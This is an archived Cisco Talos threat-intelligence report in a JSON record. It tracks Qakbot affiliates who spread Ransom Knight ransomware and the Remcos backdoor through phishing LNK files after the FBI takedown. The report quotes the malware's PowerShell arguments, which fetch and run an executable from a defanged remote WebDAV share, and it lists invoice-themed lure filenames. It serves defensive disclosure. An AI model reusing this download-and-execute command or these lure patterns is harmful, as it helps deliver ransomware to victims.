{
	"id": "c79fc5ff-ce58-4292-9b60-879afc7c9e75",
	"created_at": "2026-04-06T00:17:17.225489Z",
	"updated_at": "2026-04-10T03:21:29.826104Z",
	"deleted_at": null,
	"sha1_hash": "2117312cd27bf2350c19c9dcd74dfe51a9d5709d",
	"title": "Qakbot-affiliated actors distribute Ransom Knight malware despite infrastructure takedown",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 887694,
	"plain_text": "Qakbot-affiliated actors distribute Ransom Knight malware\r\ndespite infrastructure takedown\r\nBy Guilherme Venere\r\nPublished: 2023-10-05 · Archived: 2026-04-05 16:50:27 UTC\r\nThursday, October 5, 2023 07:00\r\nThe threat actors behind the Qakbot malware have been conducting a campaign since early August 2023 in\r\nwhich they have been distributing Ransom Knight ransomware and the Remcos backdoor via phishing\r\nemails.\r\nNotably, this activity appeared to begin before the FBI seized Qakbot infrastructure in late August and has\r\nbeen ongoing since, indicating the law enforcement operation may not have impacted Qakbot operators’\r\nspam delivery infrastructure but rather only their command and control (C2) servers.\r\nTalos attributed this new campaign to Qakbot affiliates as the metadata found in LNK files used in this\r\ncampaign matches the metadata from machines used in previous Qakbot campaigns “AA” and “BB.”\r\nThough we have not seen the threat actors distributing Qakbot itself post-infrastructure takedown, we\r\nassess the malware will continue to pose a significant threat moving forward. We see this as likely as the\r\ndevelopers were not arrested and are still operational, opening the possibility that they may choose to\r\nrebuild the Qakbot infrastructure.\r\nIn a late August 2023 operation involving the FBI and many international partners, law enforcement agencies\r\nseized the infrastructure and cryptocurrency assets used by the Qakbot malware, dealing considerable damage to\r\nthe group’s operations. 
Many people in the security industry wondered whether this would mean that the Qakbot\r\naffiliates were gone forever or just temporarily out of work while rebuilding their infrastructure.\r\nhttps://blog.talosintelligence.com/qakbot-affiliated-actors-distribute-ransom/\r\nPage 1 of 5\n\nTalos assesses with moderate confidence that the threat actors behind Qakbot are still active and have been\r\nconducting a new campaign that started just before the takedown, distributing a variant of Cyclops/Ransom\r\nKnight ransomware along with the Remcos backdoor. We tracked this new activity by connecting the metadata in\r\nthe LNK files used in the new campaign to the machines used in previous Qakbot campaigns.\r\nIn January 2023, we wrote a blog post on using metadata from LNK files to identify and track threat actors. We\r\nspecifically detailed how one machine used in the “AA” campaign with a drive serial number of “0x2848e8a8”\r\nwas later used in a campaign for the new botnet named “BB”. After our blog’s publication, primary Qakbot actors\r\nresponsible for the “AA”, “BB”, and “Obama” campaigns started to wipe out the metadata in their LNK files to\r\nmake detection and tracking harder.\r\nTalos identified new LNK files in August 2023 that were created on the same machine referenced above, but\r\nobserved that the payload of the files pointed to a network share in the command line that served a variant of\r\nRansom Knight ransomware. Further analysis of the files revealed they point to Powershell.exe and pass the\r\nfollowing arguments to download the next stage:\r\n-c \"explorer '\\\\89[.]23[.]96[.]203@80\\333\\'\"; Start-Sleep -Seconds 1; Stop-Process -Name explorer;\r\n\\\\89[.]23[.]96[.]203@80\\333\\information.exe\r\nThe command above opens Explorer.exe and attempts to access a remote network share on IP 89[.]23[.]96[.]203\r\nusing WebDAV on port 80. 
This method could be an attempt to bypass command line detection for downloading\r\nof a remote executable via PowerShell (T1105 Ingress Tool Transfer).\r\nThe filenames of these LNK files, with themes of urgent financial matters, suggest they are being distributed in\r\nphishing emails, which is consistent with previous Qakbot campaigns:\r\nATTENTION-Invoice-29-August.docx.lnk\r\nbank transfer request.lnk\r\nBooking info.pdf.lnk\r\nFattura NON pagata Agosto 2023.docx.lnk\r\nFRAUD bank transfer report.pdf.lnk\r\ninvoice OTP bank.pdf.lnk\r\nMANDATORY-Invoice-28-August.docx.lnk\r\nNOT-paid-Invoice-26-August.pdf.lnk\r\nNuove coordinate bancarie e IBAN 2023.docx.lnk\r\nNuove coordinate bancarie e IBAN 2023.img.lnk\r\nPay-Invoices-29-August.pdf.lnk\r\nURGENT-Invoice-27-August.docx.lnk\r\nSome of the filenames are written in Italian, which suggests the threat actors may be targeting users in that region.\r\nThe LNK files are being distributed inside Zip archives that also contain an XLL file. XLL is an extension used\r\nfor Excel add-ins, and comes with an icon similar to other Excel file formats:\r\nZip content for one of the phishing attachments.\r\nAccording to our analysis, these XLL files are the Remcos backdoor which is executed along with Ransom Knight\r\nto give the threat actors access to the machine after the infection:\r\nVirusTotal information for XLL file distributed along Ransom Knight LNK downloader.\r\nThe LNK file, on the other hand, downloads an executable file from remote IP 89[.]23[.]96[.]203 shown in the\r\ncommand line above via WebDAV, which is the actual Ransom Knight payload. This ransomware family is an\r\nupdated version of the Cyclops ransomware-as-a-service, rewritten from scratch. 
The threat actor behind the\r\nCyclops service announced the new variant in May 2023:\r\nDark web forum post announcing Ransom Knight ransomware.\r\nWe do not believe the Qakbot threat actors are behind the ransomware-as-a-service offer, but are simply customers\r\nof the service. As this new operation has been ongoing since the beginning of August 2023 and has not stopped\r\nafter the takedown, we believe the FBI operation didn’t affect Qakbot’s phishing email delivery infrastructure but\r\nonly its command and control servers. Though we have not seen the threat actors distributing Qakbot post-infrastructure takedown, we assess the malware will likely continue to pose a significant threat moving forward.\r\nGiven the operators remain active, they may choose to rebuild Qakbot infrastructure to fully resume their pre-takedown activity.\r\nCoverage\r\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware\r\ndetailed in this post. Try Secure Endpoint for free here.\r\nCisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in\r\nthese attacks.\r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of\r\ntheir campaign. You can try Secure Email for free here.\r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat\r\nDefense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this\r\nthreat.\r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco\r\nSecure products.\r\nUmbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and\r\nURLs, whether users are on or off the corporate network. 
Sign up for a free trial of Umbrella here.\r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites\r\nand tests suspicious sites before users access them.\r\nAdditional protections with context to your specific environment and threat data are available from the Firewall\r\nManagement Center.\r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your\r\nnetwork.\r\nClamAV detections are available for this threat:\r\nLnk.Downloader.Qakbot\r\nWin.Ransomware.Knight\r\nWin.Backdoor.Remcos\r\nIOCs\r\nIndicators of Compromise associated with this threat can be found here\r\nSource: https://blog.talosintelligence.com/qakbot-affiliated-actors-distribute-ransom/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.talosintelligence.com/qakbot-affiliated-actors-distribute-ransom/"
	],
	"report_names": [
		"qakbot-affiliated-actors-distribute-ransom"
	],
	"threat_actors": [],
	"ts_created_at": 1775434637,
	"ts_updated_at": 1775791289,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2117312cd27bf2350c19c9dcd74dfe51a9d5709d.pdf",
		"text": "https://archive.orkl.eu/2117312cd27bf2350c19c9dcd74dfe51a9d5709d.txt",
		"img": "https://archive.orkl.eu/2117312cd27bf2350c19c9dcd74dfe51a9d5709d.jpg"
	}
}